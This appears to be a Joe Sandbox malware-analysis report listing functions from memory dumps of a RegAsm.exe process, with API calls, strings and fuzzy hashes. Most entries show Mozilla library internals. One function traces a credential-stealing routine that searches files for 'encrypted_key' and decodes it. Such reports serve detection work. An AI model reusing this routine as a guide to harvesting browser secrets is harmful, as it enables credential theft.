free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C098167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C09817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C098199

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID:
API String ID: 2721933968-0
Opcode ID: 29386027f77ef753a866a728e5c010d158dbc0c71399c68caa5ad01099f688c1
Instruction ID: 90fa069abe6fb1e90c9c78c8dfc9d4adbd7d5701cb17721e7b4556626649782e
Opcode Fuzzy Hash: 29386027f77ef753a866a728e5c010d158dbc0c71399c68caa5ad01099f688c1
Instruction Fuzzy Hash: D55194B1E002049BDB00DBA9DC85BEFB7F9EF49664F140225E815E7741E730E905CBA1

Function 6C0911B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C091213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C091285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C0912B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C091327

Strings

TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C0912AD
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C09131B
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C09120D
&, xrefs: 6C09126B
MZx, xrefs: 6C0911E1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: f3b2864f756964da22edd121503072f1d891c68bdabcd5246f74d64e2b214323
Instruction ID: 36ca4aef5e71b9212848b41d4c8d27a24bbc766ae6b5c1e91804989c78744519
Opcode Fuzzy Hash: f3b2864f756964da22edd121503072f1d891c68bdabcd5246f74d64e2b214323
Instruction Fuzzy Hash: E571AF71F093588ADB209F64C8007DEB7F9BF49349F04165ED545A3B80DB34BA89DBA2

Function 6C0831C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C083217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C083236
FreeLibrary.KERNEL32 ref: 6C08324B
__Init_thread_footer.LIBCMT ref: 6C083260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C08327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C08328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0832AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0832D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0832E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0832F7

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

__aulldiv.LIBCMT ref: 6C08346B

Strings

QueryInterruptTime, xrefs: 6C083230
KernelBase.dll, xrefs: 6C083212

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 8fb6425996336f214d2fb393dcb8eb741d7b3cf4795cdaeeae0b59fa45cb1d56
Instruction ID: 4a6b35a9c213b6000498432578bbc7bbe1483fee76e6d7767ff33d2857564a27
Opcode Fuzzy Hash: 8fb6425996336f214d2fb393dcb8eb741d7b3cf4795cdaeeae0b59fa45cb1d56
Instruction Fuzzy Hash: 87610171A097018BCB11CF38C45175AB3F4FFCA354F218B1DF9A5A3691EB31A54A8B82

Function 6C0E6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C10F618), ref: 6C0E6694
GetThreadId.KERNEL32(?), ref: 6C0E66B1
GetCurrentThreadId.KERNEL32 ref: 6C0E66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C0E66E1
EnterCriticalSection.KERNEL32(6C10F618), ref: 6C0E6734
GetCurrentProcess.KERNEL32 ref: 6C0E673A
LeaveCriticalSection.KERNEL32(6C10F618), ref: 6C0E676C
GetCurrentThread.KERNEL32 ref: 6C0E67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C0E6868
RtlCaptureContext.NTDLL ref: 6C0E687F

Strings

WalkStack64, xrefs: 6C0E6890

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 1bafbb040f521e4b8748a7174d0b0820946b38ae4b5c59d0a247252ec31ecbed
Instruction ID: c6dde4a2a351c9390b42407d12e71bffc419c57a45f93d6ff1bacbc017c74dac
Opcode Fuzzy Hash: 1bafbb040f521e4b8748a7174d0b0820946b38ae4b5c59d0a247252ec31ecbed
Instruction Fuzzy Hash: 3751BC71A49305AFDB11CF25D844B5ABBF4FF89714F00492DFA9997640DB70EA08CB92

Function 6C0CDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CDE73
GetCurrentThreadId.KERNEL32 ref: 6C0CDF7D
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CDF8A
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CDFC9
GetCurrentThreadId.KERNEL32 ref: 6C0CDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C094A68), ref: 6C0CDE7B

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C094A68), ref: 6C0CDEB8
free.MOZGLUE(00000000,?,6C094A68), ref: 6C0CDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C0CDF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C0CDE83
<none>, xrefs: 6C0CDFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C0CE00E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: f6153f5d18c43124fa459971697426158e2ea4c25bafd8f055f777b6112388d1
Instruction ID: 9aceb6d2e98842e80bb58df4160b4bef1a7d1b9f269f28b5cb8a276684aa87b1
Opcode Fuzzy Hash: f6153f5d18c43124fa459971697426158e2ea4c25bafd8f055f777b6112388d1
Instruction Fuzzy Hash: 5641D131B016109BDB10AF68D849BAEB7F5FB4630CF140029ED1597B41CF75A806DBE6

Function 6C0DD840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0DD85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD918
GetCurrentThreadId.KERNEL32 ref: 6C0DD93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD970
GetCurrentThreadId.KERNEL32 ref: 6C0DD976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C0DDA2E
GetCurrentThreadId.KERNEL32 ref: 6C0DDA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DDA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C0DDA91

Part of subcall function 6C0A5C50: GetTickCount64.KERNEL32 ref: 6C0A5D40
Part of subcall function 6C0A5C50: EnterCriticalSection.KERNEL32(6C10F688), ref: 6C0A5D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DDAB7

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: 36930d23e9a53c07d971877d4b6918cabe17873ade455152ad875799a52f975b
Instruction ID: 8d62e11cc1d32ca7b210c7b739b9b3b3d019c3d9b0b5d81b70584aa50e96b39a
Opcode Fuzzy Hash: 36930d23e9a53c07d971877d4b6918cabe17873ade455152ad875799a52f975b
Instruction Fuzzy Hash: 077199756043049FCB00DF29C888B9ABBF5FF89354F15866EE85A9B305DB30A944DFA1

Function 6C0DD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0DD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD52A
GetCurrentThreadId.KERNEL32 ref: 6C0DD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD55F
free.MOZGLUE(00000000), ref: 6C0DD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C0DD5D3
GetCurrentThreadId.KERNEL32 ref: 6C0DD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD652
GetCurrentThreadId.KERNEL32 ref: 6C0DD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD6A2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 8473a165273619628c0e8905def49bef242900b411148732d41a833c954abfa8
Instruction ID: e15f6f6c7857949937d9ce9053bd18bc2d4f6aecd78370f3b157c47b31ed4cb6
Opcode Fuzzy Hash: 8473a165273619628c0e8905def49bef242900b411148732d41a833c954abfa8
Instruction Fuzzy Hash: C8515975A04705DFC704DF25C888A9ABBF4FF89358F118A2EE85A87711DB30B945CB91

Function 6C0A5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C0A56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0A56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C0A56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C0A5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C0A57BC
GetTickCount64.KERNEL32 ref: 6C0A58CB
EnterCriticalSection.KERNEL32(6C10F688), ref: 6C0A58F3
__aulldiv.LIBCMT ref: 6C0A5945
LeaveCriticalSection.KERNEL32(6C10F688), ref: 6C0A59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C10F638,?,?,?,?), ref: 6C0A59E9

Strings

MOZ_APP_RESTART, xrefs: 6C0A56CC

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: bfaa5f81fc22c623e12ee6ea4f4cf664dc83db02b215ff1c36203b8858d86f0f
Instruction ID: e2ca880dceb369b3d943e9b61b40b680e3b9a6bee3aabe822636568ec1a3b00d
Opcode Fuzzy Hash: bfaa5f81fc22c623e12ee6ea4f4cf664dc83db02b215ff1c36203b8858d86f0f
Instruction Fuzzy Hash: D9C1BF35A087409FC705CFA8C44166EBBF1FFDA714F058A1DE8D497661DB30A886DB86

Function 6C0CEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CEC8C

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

GetCurrentThreadId.KERNEL32 ref: 6C0CECA1
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C0CECC5
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C0CED19
CloseHandle.KERNEL32(?), ref: 6C0CED28
free.MOZGLUE(00000000), ref: 6C0CED2F
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C0CEC94

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: f4d9f6260bb3cd0baeb6cc31fe41e58421a4176af3c6517d9fe5b041a5c73ca2
Instruction ID: 72d73cfa760eede146b53ae7c4e52ab28ff5c985f9b0775f3faf35e32071c08b
Opcode Fuzzy Hash: f4d9f6260bb3cd0baeb6cc31fe41e58421a4176af3c6517d9fe5b041a5c73ca2
Instruction Fuzzy Hash: 1821BF75700108ABDF009F64D80ABAE77B9EB4636DF104218FD3897781DF35A8069BA6

Function 6C093A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6C093BB4
ReleaseSRWLockShared.KERNEL32 ref: 6C093BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6C093BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6C093C91
ReleaseSRWLockShared.KERNEL32 ref: 6C093CBD
moz_xmalloc.MOZGLUE ref: 6C093CF1

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 67f9732d7565318204a5148df81998ff927cc0224d715916853012f4e720609a
Instruction ID: 7b56c4f1a5d50a4549b6963fb8a419bb7767c999a5c56ebf9d1ee72dcd86c0ba
Opcode Fuzzy Hash: 67f9732d7565318204a5148df81998ff927cc0224d715916853012f4e720609a
Instruction Fuzzy Hash: 61C148B5A097018FC714DF28C08475ABBF1BF89304F159A5ED9998BB11DB31E885DF82

Function 0041580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415845
_memset.LIBCMT ref: 00415856

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2

StrStrA.SHLWAPI(00000000), ref: 0041596A
GlobalFree.KERNEL32(?), ref: 00415A8C

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

lstrcatA.KERNEL32(?,00000000), ref: 00415A18
StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
lstrcatA.KERNEL32(?,?), ref: 00415A54
lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction ID: 4905153569d8748fa83d0ede9c9d82dcbc9816826170d9825a589ea8a61000d7
Opcode Fuzzy Hash: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction Fuzzy Hash: F8713DB1D4022D9FDF20DF61DC45BCA77BAAF88314F0405E6E908A3250EA369FA58F55

Function 00428B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428B2D

Part of subcall function 00424074: Sleep.KERNEL32(00000000,?), ref: 0042409C

__calloc_crt.LIBCMT ref: 00428B51
_free.LIBCMT ref: 00428B5F
__calloc_crt.LIBCMT ref: 00428B6D
